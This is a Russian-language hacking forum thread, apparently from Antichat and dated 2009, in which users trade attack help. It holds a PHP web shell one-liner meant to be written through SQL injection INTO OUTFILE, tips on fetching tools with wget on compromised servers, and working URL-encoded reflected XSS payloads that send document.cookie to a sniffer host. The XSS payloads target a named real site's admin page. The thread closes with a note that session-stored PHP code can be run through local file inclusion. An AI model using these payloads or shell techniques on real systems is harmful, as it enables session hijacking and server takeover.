 |
|
02.12.2009, 20:55
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами:
9419426
Репутация:
648
|
|
Сообщение от 547
а вообще есть какието ограничения на количевство символов в строке....
ну в смысле когда через скулю into outfile'ом заливаеш скрипт шелла?
и еще такая конструкция <?php system($_GET['cmd']); ?> шелла сработает одинаково и на линукс сервере и на виндовс?
и wget работает и линукс и на виндовс сервере?
насколько знаю вгет это линукс качалка)
Количество символов в строке ограничивается сервером - обычно это около 4096 символов.
Но может быть ограничение и в самом скрипте.
Функци system() работает как в unix, так и в windows, только там команды шелла разные.
wget есть и под windows.
|
|
|
02.12.2009, 21:03
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от Root-access
Количество символов в строке ограничивается сервером - обычно это около 4096 символов.
Но может быть ограничение и в самом скрипте.
Функци system() работает как в unix, так и в windows, только там команды шелла разные.
wget есть и под windows.
Я так понимаю,чтобы вигет был в окошка,нужно проводить сложные манипуляции.Ибо например как ХП так и Севен,говорят что такой команды не знают.Есть ли анаоги под виндовс? Или она к этому вообще не адаптирована,и придеться юзать фтп соединение через кмд? Тоже интересно для меян просто )
|
|
|
|
02.12.2009, 21:05
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
Сообщение от [Forest]
wso вполне нормальный и не палится
че -то не очень верю в это ! в моем случае не работает. я спросил здесь, мне сказали, что хост блокирует. (wso)
|
|
|
|
02.12.2009, 21:26
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от m0Hze
Я так понимаю,чтобы вигет был в окошка,нужно проводить сложные манипуляции.Ибо например как ХП так и Севен,говорят что такой команды не знают.Есть ли анаоги под виндовс? Или она к этому вообще не адаптирована,и придеться юзать фтп соединение через кмд? Тоже интересно для меян просто )
http://www.google.com/search?q=windows+wget
http://users.ugent.be/~bpuype/cgi-bin/fetch.pl?dl=wget/wget-1.10.2.exe
|
|
|
|
02.12.2009, 22:10
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами:
9419426
Репутация:
648
|
|
Сообщение от m0Hze
Я так понимаю,чтобы вигет был в окошка,нужно проводить сложные манипуляции.Ибо например как ХП так и Севен,говорят что такой команды не знают.Есть ли анаоги под виндовс? Или она к этому вообще не адаптирована,и придеться юзать фтп соединение через кмд? Тоже интересно для меян просто )
Ээ, ХП и Севен этой команды не знают, если wget не установлен. Если бы ты погуглил, ты бы увидел, что прога под вин есть, и даже есть GUI
А вот win32 сборка Льюиса
|
|
|
|
03.12.2009, 16:05
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
С нами:
9950786
Репутация:
214
|
|
http://bans.eqline.ru/admin/add_ban.php/"><script>alert(document.cookie)</script>
если будем засылть на сниффер
типа document.location.href="http://site/sniff.php?"+document.cookie;
то XSS не отрабатывет, убираем ? и все ок,но не то ))))
в чем проблема?
|
|
|
|
03.12.2009, 16:32
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от svesve
http://bans.eqline.ru/admin/add_ban.php/"><script>alert(document.cookie)</script>
если будем засылть на сниффер
типа document.location.href="http://site/sniff.php?"+document.cookie;
то XSS не отрабатывет, убираем ? и все ок,но не то ))))
в чем проблема?
вот так работает редирект с куками
http://bans.eqline.ru/admin/add_ban.php/%22%3E%3Cscript%3Edocument.location.assign(%22http ://ya.ru/%3F%22+document.cookie);%3C/script%3E%3C!--
короче нужно ? заменить на %3F
так же работает
http://bans.eqline.ru/admin/add_ban.php/%22%3E%3Cscript%3Edocument.location.href=%22http://site/sniff.php%3f%22+document.cookie;%3C/script%3E%3C!--
__________________
Появляюсь редко. Важные дела в реале.
Последний раз редактировалось AFoST; 03.12.2009 в 16:35..
|
|
|
|
03.12.2009, 17:13
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
С нами:
9950786
Репутация:
214
|
|
2AFoST спасибо
И такой еще вопрос, что дает возможность записи пхп кода в сессию???
|
|
|
|
03.12.2009, 17:25
|
|
Banned
Регистрация: 02.12.2008
Сообщений: 43
С нами:
9178715
Репутация:
4
|
|
Сообщение от svesve
2AFoST спасибо
И такой еще вопрос, что дает возможность записи пхп кода в сессию???
прямая посылка изменяимых даннх (пхп кодэ) юзверя от которого ты дейсвуешь видимо 
|
|
|
|
03.12.2009, 17:33
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от svesve
2AFoST спасибо
И такой еще вопрос, что дает возможность записи пхп кода в сессию???
если есть локальный инклуд - даёт возможность инклудить код и испольнить его.
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для x[0]x](/avatars/avatar69745.jpg?1731643){kind=avatar}
Похожие темы
Линейный вид
